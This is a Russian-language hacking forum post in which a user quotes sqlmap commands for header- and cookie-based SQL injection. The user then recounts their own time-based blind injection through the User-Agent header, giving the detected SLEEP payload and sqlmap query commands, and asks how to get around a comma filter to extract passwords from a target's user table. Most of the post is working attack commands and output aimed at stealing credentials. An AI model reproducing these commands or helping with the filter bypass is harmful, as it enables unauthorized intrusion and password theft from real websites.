Показать сообщение отдельно

  #2  
Старый 01.03.2015, 16:16
preno
Guest
Сообщений: n/a
Провел на форуме:
55516

Репутация: 0
По умолчанию

Цитата:
Сообщение от lifescore  
lifescore said:
./sqlmap.py --headers="
User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0
" --cookie="
%Query_Cookie%
" -u '
http://url.com/path/?id=1
' --level=5 risk=3 -p
%Parametr%
Или
-r
и путь к файлу с HTTP запросом
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]POST[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]vuln[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1

Host
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com

User
[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Agent[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]4.0

id
[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR
Способ на первый взгляд сработал, вектор запросов найден, timebased SQL, я дошёл до финальной стадии когда SQLmap предлагает ввести произвольный SQL запрос и выполнить его, однако он не выполняется, на любой запрос выводит none

Пробую способ:

./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL"

Вектор атаки найден:

Payload: User-Agent: Mozilla/5.0 Gecko/20120101') AND SLEEP(5)#

Однако, в SQL иньекции фильтруются запятые, а так как я не силен в timebased векторах, то даже предположить не могу, возможно ли провести timebased атаку без запятых и выполнить грубо говоря запрос select password from user

После найденного вектора запускаю скрипт:

./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL" --sql-query="SELECT user()"

Он ждет минут 5-10 в retrieved:, пытается выполнить запрос и вытащить ответ, и по истечению времени вываливает:

SELECT user(): None

И так на любой SQL запрос. И вот вопрос, это из за запятых невозможно провести атаку, или я что то не так делаю? Подскажите пожалуйста!
 
Ответить с цитированием